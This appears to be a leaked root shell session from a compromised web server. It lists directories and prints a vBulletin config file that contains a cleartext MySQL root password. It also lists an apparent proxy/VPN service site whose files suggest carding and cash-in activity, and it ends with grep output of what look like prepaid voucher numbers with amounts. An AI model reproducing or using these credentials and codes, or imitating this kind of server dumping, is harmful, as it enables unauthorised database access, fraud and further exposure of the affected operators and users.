Spezialfaellen benoetigt ****** +// ******************************************************************************** + + // ****** MySQLI-EINSTELLUNGEN ****** + // Wenn Sie MySQL 4.1+ verwenden, sollte MySQLi fuer die Verbindung zur Datenbank + // verwendet werden. + // Wenn Ihre Datenbank einen anderen Zeichensatz als 'latin1' verwendet, koennen Sie + // hier den Standard-Zeichensatz fuer die Verbindung angeben. + // Wenn Sie nicht denselben Zeichensatz angeben, den Ihre Datenbank verwendet, kann + // es zu Fehlermeldungen dieser Art kommen: + // 'mysql error: Illegal mix of collations' + // Sie muessen diese Einstellung nur aendern, wenn Sie sicher wissen, dass dies noetig ist. +// $config['Mysqli']['charset'] = 'utf8'; + + // Zusaetzlich kann PHP angewiesen werden, die Verbindungs-Parameter aus der Datei + // auszulesen, die in 'ini_file' angegeben wurde. Bitte geben Sie den vollstaendigen + // Pfad zu dieser Datei an. + // Beispiel: + // $config['Mysqli']['ini_file'] = 'C:\Programme\MySQL\MySQL Server 4.1\my.ini'; +$config['Mysqli']['ini_file'] = ''; + + // Einstellungen fuer die Grafikverarbeitung + // Alle Grafiken, die groesser als die unten angegebenen Dimensionen sind, werden von + // vBulletin nicht verkleinert. Wenn auch groessere Grafiken verkleinert werden sollen, + // passen Sie diese Einstellungen an. +$config['Misc']['maxwidth'] = 2592; +$config['Misc']['maxheight'] = 1944; + + // GZIP komplett deaktivieren: Dies ist noetig, wenn auf dem Server standardmaessig + // GZIP aktiv ist und diese Option auch im Administrator-Kontrollzentrum aktiviert wurde. + // Dadurch ist oft in vBulletin keine Anmeldung mehr moeglich. + // Moeglicherweise ist es noetig, die folgende Zeile in der Datei /includes/init.php oder + // /includes/class_core.php aufzunehmen, damit dieser Eintrag wirksam wird. +//define('NOZIP', 1); + + // Plug-in-System komplett deaktivieren: Dies ist noetig, wenn durch + // fehlerhafte Plug-ins in vBulletin keine Anmeldung mehr moeglich ist. +//define('DISABLE_HOOKS', 1); + + // Keine E-Mails verschicken. Diese Einstellung sollte fuer ein Test-Forum aktiviert werden. +//define('DISABLE_MAIL', true); + + // Debug-Modus aktivieren: Nur fuer Entwickler gedacht. +//if (VB_AREA == 'AdminCP') +//{ +// $config['Misc']['debug'] = 1; +//} + +/*======================================================================*\ +|| #################################################################### +|| # CVS: $RCSfile$ - $Revision: 1035 $ 28757 +|| #################################################################### +\*======================================================================*/ + +// Ja, es ist richtig, dass am Ende dieser Datei kein schliessendes PHP-Tag steht! +// Dadurch wird ein haeufig auftretender Fehler vermieden. + +# cd /var/www/scenecms.org/ && ls -la +total 32 +drwxrwxrwx 4 root root 4096 Oct 1 09:18 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +drwxr-xr-x 3 root root 4096 Oct 1 09:18 ba +-rw-r--r-- 1 root root 35 Mar 15 2010 index.php +-rw-r--r-- 1 root root 9962 May 10 2010 oldDATA.tgz +drwxrwxrwx 3 root root 4096 Jul 8 2010 web + +# cd web && ls -la +total 12 +drwxrwxrwx 3 root root 4096 Jul 8 2010 . +drwxrwxrwx 4 root root 4096 Oct 1 09:18 .. +drwxr-xr-x 16 root root 4096 Oct 2 15:14 board + +# cd board/ && ls -la +total 2272 +drwxr-xr-x 16 root root 4096 Oct 2 15:14 . +drwxrwxrwx 3 root root 4096 Jul 8 2010 .. +-rw-r--r-- 1 root root 17097 Apr 23 2010 LICENSE +drwxr-xr-x 3 root root 4096 Oct 2 15:31 admincp +-rw-r--r-- 1 root root 38048 Apr 23 2010 ajax.php +-rw-r--r-- 1 root root 75538 Apr 23 2010 album.php +-rw-r--r-- 1 root root 19054 Apr 23 2010 announcement.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 archive +-rw-r--r-- 1 root root 8945 Apr 23 2010 asset.php +-rw-r--r-- 1 root root 20246 Apr 23 2010 assetmanage.php +-rw-r--r-- 1 root root 15723 Apr 23 2010 attachment.php +-rw-r--r-- 1 root root 6119 Apr 23 2010 attachment_inlinemod.php +-rw-r--r-- 1 root root 3462 Apr 23 2010 blog_attachment.php +-rw-r--r-- 1 root root 96014 Apr 23 2010 calendar.php +-rw-r--r-- 1 root root 43 Apr 23 2010 clear.gif +drwxr-xr-x 7 root root 4096 Jul 8 2010 clientscript +-rw-r--r-- 1 root root 15283 Apr 23 2010 converse.php +drwxr-xr-x 7 root root 4096 Jul 8 2010 cpstyles +-rw-r--r-- 1 root root 3244 Apr 23 2010 cron.php +-rw-r--r-- 1 root root 4051 Apr 23 2010 css.php +drwxr-xr-x 3 root root 4096 Jul 8 2010 customavatars +drwxr-xr-x 3 root root 4096 Jul 8 2010 customgroupicons +drwxr-xr-x 2 root root 4096 Jul 8 2010 customprofilepics +-rw-r--r-- 1 root root 1660 Apr 23 2010 editor.php +-rw-r--r-- 1 root root 46327 Apr 23 2010 editpost.php +-rw-r--r-- 1 root root 1336 Apr 23 2010 entry.php +-rw-r--r-- 1 root root 29278 Apr 23 2010 external.php +-rw-r--r-- 1 root root 9901 Apr 23 2010 faq.php +-rw-r--r-- 1 root root 10134 Apr 23 2010 favicon.ico +-rw-r--r-- 1 root root 22502 Apr 23 2010 forum.php +-rw-r--r-- 1 root root 42428 Apr 23 2010 forumdisplay.php +-rw-r--r-- 1 root root 2001 Apr 23 2010 global.php +-rw-r--r-- 1 root root 155709 Apr 23 2010 group.php +-rw-r--r-- 1 root root 26085 Apr 23 2010 group_inlinemod.php +-rw-r--r-- 1 root root 11483 Apr 23 2010 groupsubscription.php +-rw-r--r-- 1 root root 8974 Apr 23 2010 image.php +drwxr-xr-x 24 root root 4096 Oct 2 16:42 images +drwxr-xr-x 8 root root 12288 Oct 2 15:27 includes +-rw-r--r-- 1 root root 2335 Apr 23 2010 index.php +-rw-r--r-- 1 root root 46944 Apr 23 2010 infraction.php +-rw-r--r-- 1 root root 186868 Apr 23 2010 inlinemod.php +drwxr-xr-x 3 root root 4096 Oct 2 15:09 install +-rw-r--r-- 1 root root 11280 Apr 23 2010 joinrequests.php +-rw-r--r-- 1 root root 1656 Apr 23 2010 list.php +-rw-r--r-- 1 root root 10749 Apr 23 2010 login.php +-rw-r--r-- 1 root root 18893 Apr 23 2010 member.php +-rw-r--r-- 1 root root 16327 Apr 23 2010 member_inlinemod.php +-rw-r--r-- 1 root root 40280 Apr 23 2010 memberlist.php +-rw-r--r-- 1 root root 22247 Apr 23 2010 misc.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 modcp +-rw-r--r-- 1 root root 75687 Apr 23 2010 moderation.php +-rw-r--r-- 1 root root 6714 Apr 23 2010 moderator.php +-rw-r--r-- 1 root root 17286 Apr 23 2010 newattachment.php +-rw-r--r-- 1 root root 38921 Apr 23 2010 newreply.php +-rw-r--r-- 1 root root 19610 Apr 23 2010 newthread.php +-rw-r--r-- 1 root root 21719 Apr 23 2010 online.php +drwxr-xr-x 5 root root 4096 Jul 8 2010 packages +-rw-r--r-- 1 root root 8031 Apr 23 2010 payment_gateway.php +-rw-r--r-- 1 root root 13196 Apr 23 2010 payments.php +-rw-r--r-- 1 root root 3997 Apr 23 2010 picture.php +-rw-r--r-- 1 root root 16600 Apr 23 2010 picture_inlinemod.php +-rw-r--r-- 1 root root 26104 Apr 23 2010 picturecomment.php +-rw-r--r-- 1 root root 29273 Apr 23 2010 poll.php +-rw-r--r-- 1 root root 10349 Apr 23 2010 posthistory.php +-rw-r--r-- 1 root root 76416 Apr 23 2010 postings.php +-rw-r--r-- 1 root root 7022 Apr 23 2010 printthread.php +-rw-r--r-- 1 root root 78993 Apr 23 2010 private.php +-rw-r--r-- 1 root root 160820 Apr 23 2010 profile.php +-rw-r--r-- 1 root root 296 Apr 23 2010 receiver.php +-rw-r--r-- 1 root root 54170 Apr 23 2010 register.php +-rw-r--r-- 1 root root 5742 Apr 23 2010 report.php +-rw-r--r-- 1 root root 14700 Apr 23 2010 reputation.php +-rw-r--r-- 1 root root 34065 Apr 23 2010 search.php +-rw-r--r-- 1 root root 22645 Apr 23 2010 sendmessage.php +-rw-r--r-- 1 root root 12420 Apr 23 2010 showgroups.php +-rw-r--r-- 1 root root 12673 Apr 23 2010 showpost.php +-rw-r--r-- 1 root root 79415 Apr 23 2010 showthread.php +drwxr-xr-x 2 root root 4096 Jul 8 2010 signaturepics +-rw-r--r-- 1 root root 37650 Apr 23 2010 subscription.php +-rw-r--r-- 1 root root 5334 Apr 23 2010 tags.php +-rw-r--r-- 1 root root 8735 Apr 23 2010 threadrate.php +-rw-r--r-- 1 root root 11081 Apr 23 2010 threadtag.php +-rw-r--r-- 1 root root 61 Apr 23 2010 uploadprogress.gif +-rw-r--r-- 1 root root 39049 Apr 23 2010 usercp.php +-rw-r--r-- 1 root root 20969 Apr 23 2010 usernote.php +drwxr-xr-x 12 root root 4096 Jul 8 2010 vb +-rw-r--r-- 1 root root 27814 Apr 23 2010 visitormessage.php +-rw-r--r-- 1 root root 1660 Apr 23 2010 widget.php +-rw-r--r-- 1 root root 3656 Apr 23 2010 xmlsitemap.php + +# cat includes/config.php +<?php +/*======================================================================*\ +|| #################################################################### || +|| # vBulletin 4.0.3 Patch Level 1 +|| # ---------------------------------------------------------------- # || +|| # All PHP code in this file is ?2000-2010 vBulletin Solutions Inc. # || +|| # This file may not be redistributed in whole or significant part. # || +|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || +|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || +|| #################################################################### || +\*======================================================================*/ + +/*-------------------------------------------------------*\ +| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** | ++---------------------------------------------------------+ +| If you get any errors while attempting to connect to | +| MySQL, you will need to email your webhost because we | +| cannot tell you the correct values for the variables | +| in this file. | +\*-------------------------------------------------------*/ + + // ****** DATABASE TYPE ****** + // This is the type of the database server on which your vBulletin database will be located. + // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP 5 and MySQL 4.1+ + // for slave options just append _slave to your preferred database type. +$config['Database']['dbtype'] = 'mysql'; + + // ****** DATABASE NAME ****** + // This is the name of the database where your vBulletin will be located. + // This must be created by your webhost. +$config['Database']['dbname'] = 'forum'; + + // ****** TABLE PREFIX ****** + // Prefix that your vBulletin tables have in the database. +$config['Database']['tableprefix'] = ''; + + // ****** TECHNICAL EMAIL ADDRESS ****** + // If any database errors occur, they will be emailed to the address specified here. + // Leave this blank to not send any emails when there is a database error. +$config['Database']['technicalemail'] = 'admin@scenecms.org'; + + // ****** FORCE EMPTY SQL MODE ****** + // New versions of MySQL (4.1+) have introduced some behaviors that are + // incompatible with vBulletin. Setting this value to "true" disables those + // behaviors. You only need to modify this value if vBulletin recommends it. +$config['Database']['force_sql_mode'] = false; + + + + // ****** MASTER DATABASE SERVER NAME AND PORT ****** + // This is the hostname or IP address and port of the database server. + // If you are unsure of what to put here, leave the default values. +$config['MasterServer']['servername'] = 'localhost'; +$config['MasterServer']['port'] = 3306; + + // ****** MASTER DATABASE USERNAME & PASSWORD ****** + // This is the username and password you use to access MySQL. + // These must be obtained through your webhost. +$config['MasterServer']['username'] = 'root'; +$config['MasterServer']['password'] = 'QkZorIZZC5e'; + + // ****** MASTER DATABASE PERSISTENT CONNECTIONS ****** + // This option allows you to turn persistent connections to MySQL on or off. + // The difference in performance is negligible for all but the largest boards. + // If you are unsure what this should be, leave it off. (0 = off; 1 = on) +$config['MasterServer']['usepconnect'] = 0; + + + + // ****** SLAVE DATABASE CONFIGURATION ****** + // If you have multiple database backends, this is the information for your slave + // server. If you are not 100% sure you need to fill in this information, + // do not change any of the values here. +$config['SlaveServer']['servername'] = ''; +$config['SlaveServer']['port'] = 3306; +$config['SlaveServer']['username'] = ''; +$config['SlaveServer']['password'] = ''; +$config['SlaveServer']['usepconnect'] = 0; + + + + // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ****** + // This setting allows you to change the name of the folders that the admin and + // moderator control panels reside in. You may wish to do this for security purposes. + // Please note that if you change the name of the directory here, you will still need + // to manually change the name of the directory on the server. +$config['Misc']['admincpdir'] = 'admincp'; +$config['Misc']['modcpdir'] = 'modcp'; + + // Prefix that all vBulletin cookies will have + // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z +$config['Misc']['cookieprefix'] = 'bb'; + + // ******** FULL PATH TO FORUMS DIRECTORY ****** + // On a few systems it may be necessary to input the full path to your forums directory + // for vBulletin to function normally. You can ignore this setting unless vBulletin + // tells you to fill this in. Do not include a trailing slash! + // Example Unix: + // $config['Misc']['forumpath'] = '/home/users/public_html/forums'; + // Example Win32: + // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3'; +$config['Misc']['forumpath'] = '/var/www/scenecms.org/web/board'; + + + + // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ****** + // The users specified here will be allowed to view the admin log in the control panel. + // Users must be specified by *ID number* here. To obtain a user's ID number, + // view their profile via the control panel. If this is a new installation, leave + // the first user created will have a user ID of 1. Seperate each userid with a comma. +$config['SpecialUsers']['canviewadminlog'] = '1'; + + // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ****** + // The users specified here will be allowed to remove ("prune") entries from the admin + // log. See the above entry for more information on the format. +$config['SpecialUsers']['canpruneadminlog'] = '1'; + + // ****** USERS WITH QUERY RUNNING PERMISSIONS ****** + // The users specified here will be allowed to run queries from the control panel. + // See the above entries for more information on the format. + // Please note that the ability to run queries is quite powerful. You may wish + // to remove all user IDs from this list for security reasons. +$config['SpecialUsers']['canrunqueries'] = ''; + + // ****** UNDELETABLE / UNALTERABLE USERS ****** + // The users specified here will not be deletable or alterable from the control panel by any users. + // To specify more than one user, separate userids with commas. +$config['SpecialUsers']['undeletableusers'] = ''; + + // ****** SUPER ADMINISTRATORS ****** + // The users specified below will have permission to access the administrator permissions + // page, which controls the permissions of other administrators +$config['SpecialUsers']['superadministrators'] = '1'; + + // ****** DATASTORE CACHE CONFIGURATION ***** + // Here you can configure different methods for caching datastore items. + // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php + // vB_Datastore_APC - to use APC + // vB_Datastore_XCache - to use XCache + // vB_Datastore_Memcached - to use a Memcache server, more configuration below +// $config['Datastore']['class'] = 'vB_Datastore_Filecache'; + + // ******** DATASTORE PREFIX ****** + // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more + // than one set of forums installed on your host, you *may* need to use a prefix + // so that they do not try to use the same variable within the cache. + // This works in a similar manner to the database table prefix. +// $config['Datastore']['prefix'] = ''; + + // It is also necessary to specify the hostname or IP address and the port the server is listening on +/* +$config['Datastore']['class'] = 'vB_Datastore_Memcached'; +$i = 0; +// First Server +$i++; +$config['Misc']['memcacheserver'][$i] = '127.0.0.1'; +$config['Misc']['memcacheport'][$i] = 11211; +$config['Misc']['memcachepersistent'][$i] = true; +$config['Misc']['memcacheweight'][$i] = 1; +$config['Misc']['memcachetimeout'][$i] = 1; +$config['Misc']['memcacheretry_interval'][$i] = 15; +*/ + +// ****** The following options are only needed in special cases ****** + + // ****** MySQLI OPTIONS ***** + // When using MySQL 4.1+, MySQLi should be used to connect to the database. + // If you need to set the default connection charset because your database + // is using a charset other than latin1, you can set the charset here. + // If you don't set the charset to be the same as your database, you + // may receive collation errors. Ignore this setting unless you + // are sure you need to use it. +// $config['Mysqli']['charset'] = 'utf8'; + + // Optionally, PHP can be instructed to set connection parameters by reading from the + // file named in 'ini_file'. Please use a full path to the file. + // Example: + // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini'; +$config['Mysqli']['ini_file'] = ''; + +// Image Processing Options + // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger images, alter these settings. +$config['Misc']['maxwidth'] = 2592; +$config['Misc']['maxheight'] = 1944; + +/*======================================================================*\ +|| #################################################################### +|| # +|| # CVS: $RCSfile$ - $Revision: 32878 $ +|| #################################################################### +\*======================================================================*/ + +# cd /var/www/vpn24.org/ && ls -la +total 120 +drwxr-xr-x 3 root root 4096 Dec 13 22:18 . +drwxr-xr-x 9 root root 4096 Dec 28 02:33 .. +-rw-r--r-- 1 root root 35 May 9 2010 index.php +-rwxr-xr-x 1 root root 18378 Nov 8 19:00 testVicSocks +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 web + +# cd web + +# ls -la | grep -v cookie.txt +total 3296 +drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 . +drwxr-xr-x 3 root root 4096 Dec 13 22:18 .. +-rw-r--r-- 1 www-data www-data 6413 Dec 11 07:33 21Kms__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Jan 3 18:07 5Liter__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 4 17:35 AtzePeng__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 1 10:29 BloodySunday__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 17 12:39 Delphinko__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 18:47 DieFliege__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 28 19:38 DingDong__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 15 13:59 Emrano__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 20:14 EsseX__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 6 20:22 Firewall__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 20 11:18 HohesC__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 23 14:28 ICHICH__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 17:53 Janitor1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 27 14:04 KaLLi__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 5 12:17 Keineloe__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 17:26 Lognot__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 3 20:11 Maxim__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 1 14:35 MysticSun__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 27 08:53 QuickSilver__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 24 01:01 Selfcut__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 19 20:52 SlamD__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 18 14:05 Sparkasse__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 13:19 TheKing__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Jan 1 22:54 Tiberius1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 23 15:04 WeArEoNe__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 13 10:02 __splittingError.htm +-rw-r--r-- 1 www-data root 257 Nov 18 20:01 abo.php +-rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_lu.php +-rw-r--r-- 1 root root 5186 Nov 4 20:46 abo_ru.php +-rw-r--r-- 1 www-data root 4508 Nov 18 20:43 account.php +-rw-r--r-- 1 www-data www-data 6412 Nov 14 07:33 analytics__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 18 12:36 andreas7411__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 16 11:40 asdfghjkl__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 9 10:37 b0uNz__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 17:38 b14ckf1ag__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 2 02:09 b2323__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 13:43 b7233__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 11 19:37 bLackftw1989__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 9 13:49 becks__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 12 15:42 beware__splittingError.htm +-rw-r--r-- 1 www-data root 1209 Jan 26 2010 buy.php +-rw-r--r-- 1 www-data www-data 6412 Dec 6 13:12 c4sh1__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 8 18:10 cardercarder__splittingError.htm +drwxrwxrwx 3 www-data root 36864 Jan 7 18:38 cashIn +-rw-r--r-- 1 www-data root 393 Nov 18 20:29 cashin.php +-rw-r--r-- 1 root root 1291 Nov 18 19:05 check_one_vsocks5123213.php +-rw-r--r-- 1 root root 2219 Nov 12 00:15 checkvsocks.php +-rw-r--r-- 1 www-data www-data 6412 Nov 11 22:01 crack__splittingError.htm +-rw-r--r-- 1 www-data www-data 1063 Dec 27 16:40 dbg.html +-rw-r--r-- 1 www-data www-data 6412 Nov 21 15:48 djdalio__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 10 22:27 docscanner__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 17 14:41 duden__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 1 14:38 dudex__splittingError.htm +-rw-r--r-- 1 www-data www-data 1063 Dec 27 16:11 dump.html +-rw-r--r-- 1 www-data www-data 6412 Dec 3 13:45 enosaires__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 30 11:16 epoepo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 20 19:41 erebos1337__splittingError.htm +-rw-r--r-- 1 www-data root 311 Nov 18 20:21 faq.php +-rw-r--r-- 1 root root 1406 Nov 18 23:11 favicon.ico +-rw-r--r-- 1 www-data www-data 6412 Dec 14 13:24 frankylo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 16:48 fuckdawn__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 24 16:14 hackbart2__splittingError.htm +-rw-r--r-- 1 root root 967 Aug 3 19:00 handleVsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 13 00:18 hans2000__splittingError.htm +-rw-r--r-- 1 root root 56 May 11 2010 hdf2.php +-rw-r--r-- 1 www-data root 1064 Jul 17 14:33 header.php +-rw-r--r-- 1 root root 950 Nov 18 21:54 header2.php +-rw-r--r-- 1 www-data www-data 6412 Dec 13 15:32 hexst4tic__splittingError.htm +-rw-r--r-- 1 www-data root 1380 Aug 23 01:44 home.php +-rw-r--r-- 1 root root 178 Nov 15 18:01 home2.php +-rw-r--r-- 1 www-data www-data 6412 Nov 9 20:00 hund123456__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 22 18:04 iKas2__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 7 19:15 iiyama__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 13 10:08 ikarus22__splittingError.htm +drwxr-xr-x 2 www-data root 4096 Nov 4 21:36 images +drwxr-xr-x 2 root root 4096 Nov 18 21:45 images2 +-rw-r--r-- 1 root root 10646 Nov 18 23:16 index.php +-rw-r--r-- 1 root root 4299 Nov 18 21:26 indexORIGINALbss213123123.php +-rw-r--r-- 1 www-data www-data 6411 Nov 16 15:37 jensmaul__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 15 19:51 joeee__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 17 21:01 jojo187__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 23:53 jojoman__splittingError.htm +-rw-r--r-- 1 www-data www-data 4853 Nov 23 15:15 juicestin__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Nov 24 20:33 juliasutter__splittingError.htm +-rw-r--r-- 1 www-data www-data 6515 Dec 1 23:49 kackpfosten__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 17 20:07 keystyle__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 14:21 kirmi__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Nov 10 18:42 klaudio__splittingError.htm +drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 koksundnuTTen88 +-rw-r--r-- 1 www-data www-data 6411 Dec 14 13:32 kucke17__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 05:37 latestnews__splittingError.htm +-rw-r--r-- 1 root root 156 Nov 18 19:10 listallvsocks62342134543.php +-rw-r--r-- 1 www-data root 1421 May 9 2010 listssh.php +-rw-r--r-- 1 www-data root 1781 Nov 18 20:28 listvpn.php +-rw-r--r-- 1 root root 1245 May 15 2010 loadssh.php +-rw-r--r-- 1 www-data www-data 1630 May 6 2010 login.php +-rw-r--r-- 1 root root 7442 Nov 18 20:27 lu_abo.php +-rw-r--r-- 1 root root 1274 Nov 4 21:05 lu_loadssh.php +-rw-r--r-- 1 root root 3126 Nov 18 20:17 lu_socks5.php +-rw-r--r-- 1 www-data www-data 6412 Jan 3 16:19 magi007__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 23 21:56 makko__splittingError.htm +drwxr-xr-x 2 root root 4096 Dec 23 12:15 moneystream +-rw-r--r-- 1 www-data root 182 May 10 2010 mysql.php +-rw-r--r-- 1 root root 3879 Nov 18 20:27 newProxie.php +-rw-r--r-- 1 www-data root 596 Nov 18 20:07 news.php +-rw-r--r-- 1 www-data root 362 May 6 2010 news_overview.php +-rw-r--r-- 1 root root 380 Nov 15 17:58 news_overview2.php +-rw-r--r-- 1 www-data www-data 6412 Nov 18 12:24 nitex__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 14 19:08 offlinejack__splittingError.htm +drwxr-xr-x 2 www-data root 36864 Jan 7 19:58 ovpn +-rw-r--r-- 1 www-data www-data 6412 Dec 7 19:56 pablo__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 10 20:04 pan1c__splittingError.htm +-rw-r--r-- 1 www-data www-data 6512 Dec 7 22:57 pappe223__splittingError.htm +-rw-r--r-- 1 root root 1326 Aug 24 19:30 poll.php +-rw-r--r-- 1 www-data www-data 6411 Dec 14 14:07 pscBastard__splittingError.htm +-rw-r--r-- 1 root root 256 Sep 13 16:27 pscashin.php +-rw-r--r-- 1 www-data www-data 6409 Jan 7 23:47 pwnny__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 19 19:59 pyrodeath__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 14 16:24 qqqqqq__splittingError.htm +-rw-r--r-- 1 www-data root 2817 Nov 18 22:46 register.php +-rw-r--r-- 1 www-data www-data 6412 Dec 29 17:02 reideen__splittingError.htm +-rw-r--r-- 1 root root 7157 Nov 18 20:26 ru_abo.php +-rw-r--r-- 1 root root 1262 Nov 4 21:05 ru_loadssh.php +-rw-r--r-- 1 root root 3025 Nov 18 20:16 ru_socks5.php +-rw-r--r-- 1 www-data root 1196 Nov 24 17:32 saveReq.php +-rw-r--r-- 1 www-data root 5125 Aug 29 16:29 shop.php +-rw-r--r-- 1 www-data www-data 6412 Dec 10 14:33 shore__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 3 20:35 slic3menic3__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 15 22:18 snowghost__splittingError.htm +-rw-r--r-- 1 www-data root 263 Nov 18 20:16 socks5.php +-rw-r--r-- 1 root root 574 Oct 7 18:54 socksdetails.php +-rw-r--r-- 1 www-data www-data 6412 Nov 9 16:10 spran__splittingError.htm +-rw-r--r-- 1 www-data root 3104 Nov 18 20:20 styles.css +drwxr-xr-x 2 root root 4096 Oct 21 18:25 suPPortPanel18 +-rw-r--r-- 1 www-data www-data 6412 Dec 23 16:07 sunrise__splittingError.htm +-rw-r--r-- 1 www-data root 1336 Nov 18 20:53 support.php +-rw-r--r-- 1 www-data www-data 6412 Jan 2 16:36 test569__splittingError.htm +-rw-r--r-- 1 root root 171 May 12 2010 time.php +-rw-r--r-- 1 www-data www-data 6412 Nov 11 18:38 traden90__splittingError.htm +-rw-r--r-- 1 root root 139 Dec 28 14:21 ukashin.php +-rw-r--r-- 1 root root 2118 Nov 18 20:25 uvsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 15 07:03 vpn24__splittingError.htm +-rw-r--r-- 1 www-data root 799 May 6 2010 vsocks.php +-rw-r--r-- 1 www-data www-data 6412 Dec 28 14:25 w333d__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 14 17:17 winkel72__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 8 12:53 xc0re__splittingError.htm +-rw-r--r-- 1 www-data www-data 6412 Dec 11 11:52 xxx3xxx4__splittingError.htm +-rw-r--r-- 1 www-data www-data 6411 Dec 4 16:45 zezol__splittingError.htm + +# cat *splittingError.htm | grep "Failed</td>" +<tr><td>6337180255464896366</td><td>Failed</td><td>100.00</td></tr> +<tr><td>6337180253212809062</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180252076434686</td><td>Failed</td><td>20.00</td></tr> +<tr><td>6337180253299398565</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180257214002899</td><td>Failed</td><td>3.00</td></tr> +<tr><td>6337180259183915580</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180252532009429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180250390679390</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6330949130319304248</td><td>Failed</td><td>30.00</td></tr> +<tr><td>6337180259379552429</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180258343754368</td><td>Failed</td><td>5.00</td></tr> +<tr><td>6337180256917976433</td><td>Failed</td><td>2.14</td></tr> +<tr><td>6337180251009203952</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180111553585578</td><td>Failed</td><td>4.00</td></tr> +<tr><td>6337180258177204589</td><td>Failed</td><td>10.00</td></tr> +<tr><td>6337180253681177082</td><td>Failed</td><td>10.00</td></tr> 